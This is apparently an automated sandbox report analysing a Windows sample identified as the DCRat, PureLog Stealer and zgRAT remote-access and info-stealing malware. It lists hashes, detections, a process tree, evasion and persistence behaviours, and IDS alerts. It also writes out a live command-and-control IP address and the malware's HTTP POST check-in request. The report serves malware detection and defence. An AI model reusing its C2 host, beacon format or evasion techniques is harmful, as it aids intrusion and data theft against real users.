Windows Analysis Report
teh76E2k50.exe

Overview

General Information

Sample name: teh76E2k50.exe
renamed because original name is a hash value
Original sample name: 832D64C5F330BE9505301104FCFC574A.exe
Analysis ID: 1547568
MD5: 832d64c5f330be9505301104fcfc574a
SHA1: de70a17b5e6f2186bb611e9bfacdcfe6b4fd9ed2
SHA256: 29472c5e2c502ed00e6e34e4c8ef71be0e94a0971f548df68689aaf23b8f1064
Tags: DCRat, exe, user-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • teh76E2k50.exe (PID: 5772 cmdline: "C:\Users\user\Desktop\teh76E2k50.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
    • cmd.exe (PID: 1568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5880 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 2436 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 4072 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
        • cmd.exe (PID: 5576 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 5632 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 2508 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 4616 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
            • cmd.exe (PID: 2000 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 1964 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 2968 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 4564 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                • cmd.exe (PID: 6276 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 5268 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 3160 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 6500 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                    • cmd.exe (PID: 2072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • chcp.com (PID: 5800 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                      • w32tm.exe (PID: 6980 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                      • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 1672 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                        • cmd.exe (PID: 5028 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • chcp.com (PID: 5416 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                          • PING.EXE (PID: 5512 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                          • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 7084 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                            • cmd.exe (PID: 5760 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                              • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                              • chcp.com (PID: 3692 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                              • w32tm.exe (PID: 5812 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                              • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 6088 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                                • cmd.exe (PID: 4140 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                  • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                  • chcp.com (PID: 6044 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                  • w32tm.exe (PID: 2636 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                  • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 5528 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                                    • cmd.exe (PID: 4952 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                      • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                      • chcp.com (PID: 2296 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                      • w32tm.exe (PID: 2612 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                      • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 1852 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                                        • cmd.exe (PID: 1164 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                          • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
teh76E2k50.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
teh76E2k50.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.2197360091.00000000008F2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.2310983468.00000000133EC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: teh76E2k50.exe PID: 5772 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe PID: 4072 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.teh76E2k50.exe.8f0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.teh76E2k50.exe.8f0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                            System Summary

                            Source: File created Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\teh76E2k50.exe, ProcessId: 5772, TargetFilename: C:\Windows\SchCache\sihost.exe
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2024-11-02T17:47:40.982112+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49782 | TCP
                            2024-11-02T17:48:18.795771+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49984 | TCP

                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2024-11-02T17:47:48.403181+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49829 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:48:03.731878+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49909 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:48:25.612187+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49998 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:48:35.409477+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 50000 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:48:48.746972+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 50002 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:48:58.684477+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 50004 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:49:10.569070+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 50005 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:49:23.997157+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 50008 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:49:32.751139+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 50009 | 194.135.20.4 | 80 | TCP
                            2024-11-02T17:49:45.710601+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 50011 | 194.135.20.4 | 80 | TCP

                            AV Detection

                            Source: teh76E2k50.exeAvira: detected
                            Source: C:\Users\user\AppData\Local\Temp\znx0BCuWHE.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\tOMWzubzd4.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\uHdcbfRrII.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\TCMSovEgtl.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\HL35FbYWw1.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\Desktop\BVbCJhtL.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\8JExSyzmRo.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeReversingLabs: Detection: 71%
                            Source: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeReversingLabs: Detection: 71%
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\Desktop\AQotzTRR.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\ASPeVAWX.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\AVHMeQAt.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\AefMODTq.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\BGEGNIeN.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\BQYWEsJr.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\BmiVXCnN.logReversingLabs: Detection: 33%
                            Source: C:\Users\user\Desktop\CJDckQCP.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\CUHLiuul.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\DUVDVzTj.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\DVEbprGR.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\DswJWuJN.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\FFnbpIFd.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\FIZLHNPh.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\GGiDqFDB.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\GrWSIakL.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\HJAvhXOf.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\HPmLzFXY.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\HhaNcSpz.logReversingLabs: Detection: 33%
                            Source: C:\Users\user\Desktop\IQXUcfJd.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\ITPCmwoz.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\IzyaiCCJ.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\JapvNPbx.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\JvdSwEFX.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\KFIMcleA.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\KszcatAz.logReversingLabs: Detection: 33%
                            Source: C:\Users\user\Desktop\LBCkjtUW.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\LESjjfMz.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\LGJlUtwq.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\MwSuJUdT.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\NAwlwLuv.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\NGhBOsDn.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\NQgmULbr.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\NhIjUycT.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\OOHuqLql.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\OnPkEyEo.logReversingLabs: Detection: 25%
                            Source: teh76E2k50.exeReversingLabs: Detection: 71%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\BSjUAQPo.logJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\ASPeVAWX.logJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\BMbUPQnU.logJoe Sandbox ML: detected
                            Source: teh76E2k50.exeJoe Sandbox ML: detected
                            Source: teh76E2k50.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Directory created: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Directory created: C:\Program Files\Windows Mail\81acb8af1bb493
                            Source: teh76E2k50.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2976138886.000000001B540000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3585076992.000000001B3B6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: KZll\System.pdbYA source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3345697219.000000001C023000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3058692219.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2976138886.000000001B540000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3585076992.000000001B3B6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdbpdbtem.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3503891840.000000001C100000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File opened: C:\Users\user
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File opened: C:\Users\user\AppData
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File opened: C:\Users\user\AppData\Local
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File opened: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 0_2_00007FF848BFB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Code function: 4x nop then jmp 00007FF848A622F6h 7_2_00007FF848A620EE
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 7_2_00007FF848BFB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 14_2_00007FF848BBB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 20_2_00007FF848BDB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 26_2_00007FF848BCB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Code function: 4x nop then jmp 00007FF848A322F6h 32_2_00007FF848A320EE
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 32_2_00007FF848BCB94D

                            Networking

                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49909 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49998 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50000 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50002 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50011 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50009 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50008 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50004 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49829 -> 194.135.20.4:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50005 -> 194.135.20.4:80
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox View ASN Name: ASBAXETNRU ASBAXETNRU
                            Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49782
                            Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49984
                            Source: global trafficHTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 194.135.20.4Content-Length: 344Expect: 100-continueConnection: Keep-Alive
